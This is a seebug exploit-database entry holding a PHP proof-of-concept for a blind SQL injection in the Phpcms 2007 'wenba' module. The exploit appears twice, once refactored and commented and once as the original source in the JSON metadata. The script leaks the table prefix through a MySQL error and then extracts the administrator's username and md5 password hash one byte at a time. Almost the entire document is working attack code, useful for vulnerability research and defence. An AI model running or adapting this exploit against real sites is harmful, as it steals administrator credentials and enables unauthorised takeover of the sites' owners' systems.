ID SSV:10017
Type seebug
Reporter Root
Modified 2008-11-12T00:00:00
Description
No description provided by source.
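<?php
/*
 * Phpcms 2007 "wenba" module - boolean-based blind SQL injection PoC
 * (seebug SSV:10017, original author oldjun[S.U.S]).
 *
 * The script sends crafted GET requests to wenba/my_answer.php and infers the
 * username and password hash of the member row with userid=1 one byte at a
 * time, keyed on whether the page shows its "no results" marker.
 *
 * Usage: php <script> <host> <path-ending-in-slash>
 * Only run this against systems you are authorised to test.
 *
 * Uses the full "<?php" open tag: the short "<?" tag depends on the
 * short_open_tag ini setting and is off in many installs.
 */
echo '
--------------------------------------------------------------------------------
Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit
BY oldjun[S.U.S](http://www.oldjun.com)
--------------------------------------------------------------------------------
';

// Both a host and a path are required ($argv[0] is the script itself).
// Exit non-zero on a usage error so shell callers can detect it.
if ($argc < 3) {
    echo '
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
';
    exit(1);
}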
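/**
 * Send one raw HTTP request to the global $host and store the complete
 * response (status line, headers and body) in the global $html.
 *
 * The global-based interface is kept on purpose: every caller in this script
 * reads $html immediately after the call. Improvements over the original:
 * the port and timeout are parameters instead of a hard-coded '80' and no
 * timeout at all, the socket error text is reported, and a failed write is
 * detected instead of silently returning an empty response.
 *
 * @param string $packet  complete HTTP request text, including the final blank line
 * @param int    $port    TCP port to connect to (80, as the original hard-coded)
 * @param int    $timeout connect and read timeout in seconds
 */
function sendpacketii($packet, $port = 80, $timeout = 10)
{
    global $host, $html;
    $errno = 0;
    $errstr = '';
    // fsockopen() resolves names itself, so the gethostbyname() round trip
    // is unnecessary; $errstr carries the real reason when the connect fails.
    $sock = fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$sock) {
        echo 'No response from '.$host;
        if ($errstr !== '') {
            echo ' ('.$errstr.')';
        }
        die;
    }
    stream_set_timeout($sock, $timeout);
    if (fwrite($sock, $packet) === false) {
        fclose($sock);
        echo 'No response from '.$host;
        die;
    }
    // Every request in this script carries "Connection: Close", so reading
    // until the server closes the socket yields the whole response.
    $html = (string) stream_get_contents($sock);
    fclose($sock);
}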
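$host = $argv[1];
$path = $argv[2];
// Default table prefix; replaced below if it can be read out of a MySQL error page.
$prefix = "phpcms_";
// Fixed session id, sent only with the prefix-detection request below.
// NOTE(review): the source does not say why that request needs a session
// cookie while the oracle requests do not - confirm against the target.
$cookie = "PHPSESSID=2456c055c52722efa1268504d07945f2";

// The path must start and end with "/" so "wenba/my_answer.php" appends cleanly.
// substr() is used instead of $path[0] / $path[strlen($path)-1] so that an
// empty argument fails the check instead of raising an undefined-offset notice.
if (substr($path, 0, 1) !== '/' || substr($path, -1) !== '/') {
    echo "Error... check the path!\r\n\r\n";
    die;
}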
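/* get $prefix: provoke a MySQL syntax error and read the table name from it */
$packet  = "GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Cookie: ".$cookie."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
// A verbose MySQL error echoes the broken query, which contains
// "FROM <prefix>wenba_answer ...", so the prefix is the text between
// "FROM " and "wenba_answer". stripos() replaces eregi(), which was removed
// in PHP 7; the pattern was a plain literal so the match is the same.
if (stripos($html, "in your SQL syntax") !== false) {
    $afterFrom = explode("FROM ", $html);
    if (isset($afterFrom[1])) {
        $parts = explode("wenba_answer", $afterFrom[1]);
        // Two guards the original lacked: $temp2 was dereferenced even when
        // "FROM " was absent, and when "wenba_answer" was absent the whole
        // remainder of the page became the prefix. Only accept a non-empty
        // prefix that was actually followed by the table name.
        if (count($parts) > 1 && !empty($parts[0])) {
            $prefix = $parts[0];
        }
    }
    // NOTE(review): if the server quotes identifiers the extracted prefix may
    // carry a leading backtick or quote; check the printed value before trusting it.
    echo "[+]prefix -> ".$prefix."\r\n";
}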
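echo "[~]exploting now,plz waiting...\r\n\r\n";

// Sanity check for the boolean oracle: "status=1 or 1=1" must return rows.
// If even that shows the "no results" marker, the wenba tables are empty and
// nothing can be inferred from the per-byte queries that follow.
$packet  = "GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
// GBK bytes B6 D4 B2 BB C6 F0 - the string "对不起" ("Sorry") the page shows
// when the query returns nothing. Matched as raw bytes with strpos(): eregi()
// no longer exists in PHP 7+, and since none of these bytes are regex
// metacharacters the original pattern was a literal byte search anyway.
$noResultMarker = chr(182).chr(212).chr(178).chr(187).chr(198).chr(240);
if (strpos($html, $noResultMarker) !== false) {
    echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\r\n\r\n";
    die;
}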
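/**
 * Recover one column of the <prefix>member row with userid=1, byte by byte.
 *
 * Oracle: "status=1 or 1=(select count(*) from <prefix>member where
 * ASCII(SUBSTRING(<column>,<pos>,1))=<byte> and userid=1)". A correct guess
 * makes the subquery return 1, the OR is true and the page shows data; a wrong
 * guess leaves the page showing the GBK "对不起" marker. ASCII('') is 0 for a
 * position past the end of the value, so a matched 0 byte ends the search and
 * the returned string carries that trailing "\0", exactly as the original did.
 *
 * Dies with "Exploit failed..." when no candidate matches at some position,
 * matching the original loops.
 *
 * @param string $column     column to read ("password" or "username")
 * @param int[]  $candidates byte values to try, in order
 * @param string $label      label for the progress line ("pwd" or "username")
 * @param string $path       web path ending in "/"
 * @param string $prefix     table prefix
 * @return string            recovered value, terminated by "\0"
 */
function wenba_extract_column($column, array $candidates, $label, $path, $prefix)
{
    global $host, $html;
    // GBK bytes B6 D4 B2 BB C6 F0 ("对不起") - the page's "no results" marker.
    $noResultMarker = chr(182).chr(212).chr(178).chr(187).chr(198).chr(240);
    $value = '';
    for ($pos = 1; strpos($value, "\0") === false; $pos++) {
        $matched = false;
        foreach ($candidates as $byte) {
            $packet  = "GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(".$column.",".$pos.",1))=".$byte."/**/and/**/userid=1) HTTP/1.0\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "Connection: Close\r\n\r\n";
            sendpacketii($packet);
            // strpos() replaces eregi() (removed in PHP 7); same literal byte match.
            if (strpos($html, $noResultMarker) === false) {
                $value .= chr($byte);
                echo "[+]".$label.":".$value."\r\n";
                $matched = true;
                break;
            }
        }
        if (!$matched) {
            die("Exploit failed...");
        }
    }
    return $value;
}

// Password alphabet: NUL terminator, digits and a-f - the bytes of an md5 hex digest.
$hashChars = array_merge(array(0), range(48, 57), range(97, 102));
$password = wenba_extract_column("password", $hashChars, "pwd", $path, $prefix);
// The username may hold any byte, so every value 0..255 is tried (NUL first).
$username = wenba_extract_column("username", range(0, 255), "username", $path, $prefix);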
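// Both values come back terminated by the "\0" that ended the search; strip it
// so the summary does not write a raw NUL byte to the terminal. The original
// label "md5 32λ" was a mis-encoded character and is spelled out here.
echo '
--------------------------------------------------------------------------------
[+]username -> '.rtrim($username, "\0").'
[+]password(md5, 32 hex chars) -> '.rtrim($password, "\0").'
--------------------------------------------------------------------------------
';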
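/**
 * Report whether $hash, after trimming surrounding whitespace and NUL bytes
 * (the extraction loop leaves a trailing "\0"), is exactly a 32-character
 * lowercase hex string - the shape of an md5 digest.
 *
 * ereg() was removed in PHP 7, so preg_match() is used instead. The pattern is
 * now anchored at both ends: the original only checked the first 32 characters
 * and so accepted any longer string that merely began with 32 hex digits.
 *
 * @param string $hash
 * @return bool
 */
function is_hash($hash)
{
    return preg_match('/^[a-f0-9]{32}\z/', trim((string) $hash)) === 1;
}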
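// Final verdict: a well-formed md5 hex string means the oracle worked end to end.
// Exit non-zero on failure so anyone scripting this PoC can detect the outcome.
if (is_hash($password)) {
    echo "Exploit succeeded...";
    exit(0);
}
echo "Exploit failed...";
exit(1);
?>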
{"href": "https://www.seebug.org/vuldb/ssvid-10017", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-11-12T00:00:00", "title": "Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10017", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2008-11-12T00:00:00", "sourceData": "\n <?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nPhpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit\r\nBY oldjun[S.U.S](http://www.oldjun.com)\r\n--------------------------------------------------------------------------------\r\n');\r\nif ($argc<3) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path\r\nhost: target server (ip/hostname),without"http://"\r\npath: path to phpcms\r\nExample:\r\nphp '.$argv[0].' localhost /\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n\r\nfunction sendpacketii($packet)\r\n{\r\nglobal $host, $html;\r\n$ock=fsockopen(gethostbyname($host),'80');\r\nif (!$ock) {\r\necho 'No response from '.$host; die;\r\n}\r\nfputs($ock,$packet);\r\n$html='';\r\nwhile (!feof($ock)) {\r\n$html.=fgets($ock);\r\n}\r\nfclose($ock);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$prefix="phpcms_";\r\n$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";\r\n\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))\r\n{echo "Error... 
check the path!\\r\\n\\r\\n"; die;}\r\n\r\n/*get $prefix*/\r\n$packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\\r\\n";\r\n$packet.="Host: ".$host."\\r\\n";\r\n$packet.="Cookie: ".$cookie."\\r\\n";\r\n$packet.="Connection: Close\\r\\n\\r\\n";\r\nsendpacketii($packet);\r\n//echo $html;\r\nif (eregi("in your SQL syntax",$html))\r\n{\r\n$temp=explode("FROM ",$html);\r\nif(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);}\r\nif($temp2[0])\r\n$prefix=$temp2[0];\r\necho "[+]prefix -> ".$prefix."\\r\\n";\r\n}\r\necho "[~]exploting now,plz waiting...\\r\\n\\r\\n";\r\n\r\n$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\\r\\n";\r\n$packet.="Host: ".$host."\\r\\n";\r\n$packet.="Connection: Close\\r\\n\\r\\n";\r\nsendpacketii($packet);\r\nif (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\\r\\n\\r\\n"; die;}\r\n\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password="";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$chars))\r\n{\r\n$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\\r\\n";\r\n$packet.="Host: ".$host."\\r\\n";\r\n$packet.="Connection: Close\\r\\n\\r\\n";\r\nsendpacketii($packet);\r\nif (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\\r\\n";break;}\r\n}\r\nif ($i==255) {die("Exploit failed...");}\r\n}\r\n$j++;\r\n}\r\n\r\n$j=1;$username="";\r\nwhile (!strstr($username,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\n$packet ="GET 
".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\\r\\n";\r\n$packet.="Host: ".$host."\\r\\n";\r\n$packet.="Connection: Close\\r\\n\\r\\n";\r\nsendpacketii($packet);\r\nif (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."\\r\\n";break;}\r\nif ($i==255) {die("Exploit failed...");}\r\n}\r\n$j++;\r\n}\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\n[+]username -> '.$username.'\r\n[+]password(md5 32\u03bb) -> '.$password.'\r\n--------------------------------------------------------------------------------\r\n');\r\nfunction is_hash($hash)\r\n{\r\nif (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}\r\nelse {return false;}\r\n}\r\nif (is_hash($password)) {echo "Exploit succeeded...";}\r\nelse {echo "Exploit failed...";}\r\n?>\n ", "id": "SSV:10017", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:36:59", "reporter": "Root", "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645338446}}
{}